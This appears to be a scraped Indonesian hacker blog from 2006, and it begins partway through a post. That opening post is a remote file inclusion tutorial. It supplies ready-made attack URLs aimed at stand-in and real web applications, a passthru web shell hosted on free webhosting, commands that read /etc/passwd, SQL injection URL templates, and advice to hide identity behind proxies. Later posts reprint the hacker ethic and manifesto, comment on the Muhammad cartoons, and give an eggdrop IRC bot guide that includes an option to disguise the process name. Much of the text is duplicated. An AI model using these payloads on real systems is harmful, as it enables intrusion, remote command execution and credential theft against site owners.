14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=
15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?
==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.
6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.
Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:
passthru($test);
?>
simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.
Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:
http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal
jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]
8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??
http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd
Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Thanks to,
#hackcrew, #binushacker, #kampunghacker, #batamhacker, #yogyafree dan semua pihak yang tidak bisa di sebut kan satu persatu.
Sumber :
Pengalaman Pribadi penulis
-= http://www.jasakom.com/article.aspx?ID=517 =-
-= http://www.clemens-fatek.com =-
-= http://www.yogyafree.net =-
-= http://www.hitam-putih.com =-
Saturday, February 11, 2006
Etika 'Hackers'
Seorang 'Hackers' juga punya etika, kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.
Kode etik hacker tersebut tertulis:
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali.
2. Segala informasi haruslah gratis.
3. Jangan percaya pada otoritas, promosikanlah desentralisasi.
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer.
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.
Kode etik hacker tersebut tertulis:
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali.
2. Segala informasi haruslah gratis.
3. Jangan percaya pada otoritas, promosikanlah desentralisasi.
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer.
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.
Manifesto 'Hackers'
Manifesto Hacker dibuat oleh seorang hacker yang menggunakan nickname The Mentor dan
pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Manifesto Hacker tersebut adalah:
1. Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
2. Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
3. Kami menjelajah, dan kalian sebut kami kriminal.
4. Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
5. Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
6. Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
7. Ya, aku memang seorang kriminal.
8. Kejahatanku adalah rasa keingintahuanku.
9. Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
10. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
11. Aku memang seorang hacker, dan inilah manifesto saya.
12 Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
13. Bagaimanapun juga, kami semua senasib seperjuangan.
Terima Kasih kepada ^family_code^ atas bimbingan dan pengajaran. Terima kasih pada kawan - kawan seperjuangan.Semoga ini menjadi pegangan dan ikatan kita.
pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Manifesto Hacker tersebut adalah:
1. Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
2. Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
3. Kami menjelajah, dan kalian sebut kami kriminal.
4. Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
5. Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
6. Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
7. Ya, aku memang seorang kriminal.
8. Kejahatanku adalah rasa keingintahuanku.
9. Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
10. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
11. Aku memang seorang hacker, dan inilah manifesto saya.
12 Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
13. Bagaimanapun juga, kami semua senasib seperjuangan.
Terima Kasih kepada ^family_code^ atas bimbingan dan pengajaran. Terima kasih pada kawan - kawan seperjuangan.Semoga ini menjadi pegangan dan ikatan kita.
Friday, February 10, 2006
Karikatur Nabi Muhammad
Beberapa hari ini semua orang membicarakan dan meributkan dengan masalah salah satu media denmark yang membuat karikatur yang disebut-sebut menjelekkan Nabi Muhammad.
Sejauh ini telah menyebabkan begitu banyak Kedutaan besar di Negara - negara Islam di protes dan beberapa diantaranya di bakar.Bahkan di Indonesia hal serupa terjadi di Jakarta dan Surabaya.
Mungkin kawan-kawan sekalian penasaran apa yang diributkan oleh orang banyak.Berikut ini saya berikan linknya.
-= http://www.muhammadcartoons.com =-
Rupanya hal ini malah memancing banyak reaksi negatif juga di dunia 'maya'.Hal ini malah membawa ke bentuk provokasi. Begitu banyak website yang muncul pasca kejadian tersebut; salah satunya situs berikut ini:
-= http://www.muhammadcartoons.com/ =-
Nah silahkan dech kalian melihatnya dan mencoba menilai bagaimana????
Jawaban ada pada anda sendiri dan biarlah itu menjadi bagian penilaian pada diri anda sendiri.
Saya disini tidak mau memihak maupun meributkan dan apalagi berusaha menghasut.Tapi saya hanya berharap hal seperti ini tidak pernah terjadi lagi. Biarkanlah kita tetap tenang dan tidak terhasut oleh semua tindakan yang berusaha menghancurkan manusia dengan memecah-mecahnya.
Penulis tidak bertanggung jawab atas tindakan yang dilakukan karena membaca tulisan ini. Tulisan ini hanyalah sebagai informasi.
Sejauh ini telah menyebabkan begitu banyak Kedutaan besar di Negara - negara Islam di protes dan beberapa diantaranya di bakar.Bahkan di Indonesia hal serupa terjadi di Jakarta dan Surabaya.
Mungkin kawan-kawan sekalian penasaran apa yang diributkan oleh orang banyak.Berikut ini saya berikan linknya.
-= http://www.muhammadcartoons.com =-
Rupanya hal ini malah memancing banyak reaksi negatif juga di dunia 'maya'.Hal ini malah membawa ke bentuk provokasi. Begitu banyak website yang muncul pasca kejadian tersebut; salah satunya situs berikut ini:
-= http://www.muhammadcartoons.com/ =-
Nah silahkan dech kalian melihatnya dan mencoba menilai bagaimana????
Jawaban ada pada anda sendiri dan biarlah itu menjadi bagian penilaian pada diri anda sendiri.
Saya disini tidak mau memihak maupun meributkan dan apalagi berusaha menghasut.Tapi saya hanya berharap hal seperti ini tidak pernah terjadi lagi. Biarkanlah kita tetap tenang dan tidak terhasut oleh semua tindakan yang berusaha menghancurkan manusia dengan memecah-mecahnya.
Penulis tidak bertanggung jawab atas tindakan yang dilakukan karena membaca tulisan ini. Tulisan ini hanyalah sebagai informasi.
Sunday, February 05, 2006
Membuat Eggdrop NetGate pada shell
Selama ini pada saat saya Chatting di IRC.Dal.Net, banyak orang selalu bertanya dan memohon bantuan pada saya untuk membuat Bot atau PsyBNC pada shell mereka. Cukup banyak sudah orang yang mendapatkan pengajaran dari saya. Nah pada kesempatan ini saya akan berbagi sedikit bersama kawan semua untuk memberikan Tutor sedikit bagaimana membuat Eggdrop pada shell. Dalam hal ini shell pada sistem operasi linux.
Nah mari kita mulai Tutor kita kali ini:
1. Nah seperti biasanya sebelum kita memulai sesuatu marilah kita menyiapkan diri kita agar dapat bekerja dengan baik.
2. Jangan lupa untuk menyalakan rokok dan minum segelas kopi hangat agar diri kita tetap santai dalam melakukan segala sesuatunya.
3. Hmm...setelah anda santai dan rileks barulah kita bisa memulai nya.
4. Pertama kali ambillah eggdrop yang kita inginkan pada situs kesayangan kita, atau dalam hal ini kita akan ambil eggdrop keluaran Netgate pada http://geocities.com/kake_rgb/bot/eggdrop.tgz. Nah cara mengambil terserah pada anda. Salah satu alternatif adalah dengan mendownload dulu file eggdrop ke kompi anda, lalu setelah itu dengan menggunakan layanan ftp pada shell anda maka anda tinggal menaruh file eggdrop pada shell anda. Alternatif lain adalah jika anda menggunakan sistem operasi linux pada shell anda maka anda dapat mendownload secara langsung dengan menggunakan fasilitas layanan, Misal : wget http://geocities.com/kake_rgb/bot/eggdrop.tgz.
5. Nah setelah kita sudah mendapatkan file eggdrop.tgz pada shell anda barulah kita melakukan ekstrak pada file tersebut. Untuk melakukannya kita tinggal mengetikkan : tar -zxvf. Dalam kasus ini adalah : tar -zxvf eggdrop.tgz. Nah setelah terekstrak maka anda akan menemukan sebuah directory eggdrop.
6. Lalu akses lah direktory tersebut dengan mengetikkan : cd eggdrop
7. Setelah kita berada pada direktori eggdrop. Maka kita akan disuguhkan beberapa file dan direktori untuk membuat bot netgate tersebut, sebagai berikut:
[januar@server eggdrop]$ ls
doc filesys language lokasi.csv scripts start xh
eggdrop help logs README setting.conf text
[januar@server eggdrop]$
8. File setting.conf : adalah merupakan file utama konfigurasi yang akan digunakan.Nah untuk menjalankannya ketik : ./start
Maka akan tampil sebagai berikut:
[januar@server eggdrop]$ ./start
#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################
Cara Penggunaan:
./start ""
filename = nama file konfigurasi
nick = nama nick untuk bot
ident = ident untuk bot
ip = alamat IP yang digunakan (numeric)
fullname = fullname untuk bot, gunakan petik untuk lebih dari 1 kata
channel = channel bot untuk join (tanpa karakter #)
owner = nick untuk owner
[januar@server eggdrop]$
9. Nah untuk membuat bot kita cukup ikuti sesuai petunjuk. Misal aku ingin bikin file konfigurasi sebagai berikut :
[januar@server eggdrop]$ ./start botk4k3 botk4k3 Crewk4k3 192.168.21.21 "Bot milik k4k3" hackcrew k4k3
Maka akan ditampilkan menu:
#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################
File konfigurasi : botk4k3
set nick "botk4k3"
set username "Crewk4k3"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set realname "Bot milik k4k3"
set basechan "#hackcrew"
set owner "k4k3"
------------------------------------
File konfigurasi berhasil dibuat !!!
------------------------------------
Langkah berikutnya, pilihlah salah satu menu berikut:
(1) Jalankan eggdrop dengan menyamarkan nama program
(2) Jalankan eggdrop dengan nama asli
(3) Keluar dari program ini
Masukkan pilihan [1|2|3]:
jika itu shell anda sendiri maka pilihlah no 2.Ketik kan angka : 2
Jika semua berjalan lancar maka akan ditampilkan menu sebagai berikut :
STARTING BOT IN USERFILE CREATION MODE.
Telnet to the bot and enter 'NEW' as your nickname.
OR go to IRC and type: /msg botk4k3 hello
This will make the bot recognize you as the master.
[19:50] === botk4k3: 0 channels, 0 users.
Launched into the background (pid: 6460)
setelah itu tunggulah bot anda di channel anda dan sapa lah ia dengan mengetik :
/msg botk4k3 hello
Maka dia akan mengenali anda sebagai owner nya. Jangan lupa setting passwd dan bacalah keterangannya dengan mengetik /msg botk4k3 help
Nah selamat mengkonfigurasi bot anda.
Untuk jenis bot Netgate lain tinggal menyesuaikan saja.Ikuti saja keterangan yang ada, saya rasa cukup mudah.Terima kasih atas perhatiannya.
Demikian lah artikel ini dibuat untuk menjadi pengetahuan bagi anda.Segala tindakan yang dilakukan karena membaca artikel ini bukan merupakan tanggung jawab penulis.
Nah mari kita mulai Tutor kita kali ini:
1. Nah seperti biasanya sebelum kita memulai sesuatu marilah kita menyiapkan diri kita agar dapat bekerja dengan baik.
2. Jangan lupa untuk menyalakan rokok dan minum segelas kopi hangat agar diri kita tetap santai dalam melakukan segala sesuatunya.
3. Hmm...setelah anda santai dan rileks barulah kita bisa memulai nya.
4. Pertama kali ambillah eggdrop yang kita inginkan pada situs kesayangan kita, atau dalam hal ini kita akan ambil eggdrop keluaran Netgate pada http://geocities.com/kake_rgb/bot/eggdrop.tgz. Nah cara mengambil terserah pada anda. Salah satu alternatif adalah dengan mendownload dulu file eggdrop ke kompi anda, lalu setelah itu dengan menggunakan layanan ftp pada shell anda maka anda tinggal menaruh file eggdrop pada shell anda. Alternatif lain adalah jika anda menggunakan sistem operasi linux pada shell anda maka anda dapat mendownload secara langsung dengan menggunakan fasilitas layanan, Misal : wget http://geocities.com/kake_rgb/bot/eggdrop.tgz.
5. Nah setelah kita sudah mendapatkan file eggdrop.tgz pada shell anda barulah kita melakukan ekstrak pada file tersebut. Untuk melakukannya kita tinggal mengetikkan : tar -zxvf
6. Lalu akses lah direktory tersebut dengan mengetikkan : cd eggdrop
7. Setelah kita berada pada direktori eggdrop. Maka kita akan disuguhkan beberapa file dan direktori untuk membuat bot netgate tersebut, sebagai berikut:
[januar@server eggdrop]$ ls
doc filesys language lokasi.csv scripts start xh
eggdrop help logs README setting.conf text
[januar@server eggdrop]$
8. File setting.conf : adalah merupakan file utama konfigurasi yang akan digunakan.Nah untuk menjalankannya ketik : ./start
Maka akan tampil sebagai berikut:
[januar@server eggdrop]$ ./start
#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################
Cara Penggunaan:
./start
filename = nama file konfigurasi
nick = nama nick untuk bot
ident = ident untuk bot
ip = alamat IP yang digunakan (numeric)
fullname = fullname untuk bot, gunakan petik untuk lebih dari 1 kata
channel = channel bot untuk join (tanpa karakter #)
owner = nick untuk owner
[januar@server eggdrop]$
9. Nah untuk membuat bot kita cukup ikuti sesuai petunjuk. Misal aku ingin bikin file konfigurasi sebagai berikut :
[januar@server eggdrop]$ ./start botk4k3 botk4k3 Crewk4k3 192.168.21.21 "Bot milik k4k3" hackcrew k4k3
Maka akan ditampilkan menu:
#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################
File konfigurasi : botk4k3
set nick "botk4k3"
set username "Crewk4k3"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set realname "Bot milik k4k3"
set basechan "#hackcrew"
set owner "k4k3"
------------------------------------
File konfigurasi berhasil dibuat !!!
------------------------------------
Langkah berikutnya, pilihlah salah satu menu berikut:
(1) Jalankan eggdrop dengan menyamarkan nama program
(2) Jalankan eggdrop dengan nama asli
(3) Keluar dari program ini
Masukkan pilihan [1|2|3]:
jika itu shell anda sendiri maka pilihlah no 2.Ketik kan angka : 2
Jika semua berjalan lancar maka akan ditampilkan menu sebagai berikut :
STARTING BOT IN USERFILE CREATION MODE.
Telnet to the bot and enter 'NEW' as your nickname.
OR go to IRC and type: /msg botk4k3 hello
This will make the bot recognize you as the master.
[19:50] === botk4k3: 0 channels, 0 users.
Launched into the background (pid: 6460)
setelah itu tunggulah bot anda di channel anda dan sapa lah ia dengan mengetik :
/msg botk4k3 hello
Maka dia akan mengenali anda sebagai owner nya. Jangan lupa setting passwd dan bacalah keterangannya dengan mengetik /msg botk4k3 help
Nah selamat mengkonfigurasi bot anda.
Untuk jenis bot Netgate lain tinggal menyesuaikan saja.Ikuti saja keterangan yang ada, saya rasa cukup mudah.Terima kasih atas perhatiannya.
Demikian lah artikel ini dibuat untuk menjadi pengetahuan bagi anda.Segala tindakan yang dilakukan karena membaca artikel ini bukan merupakan tanggung jawab penulis.
Subscribe to:
Posts (Atom)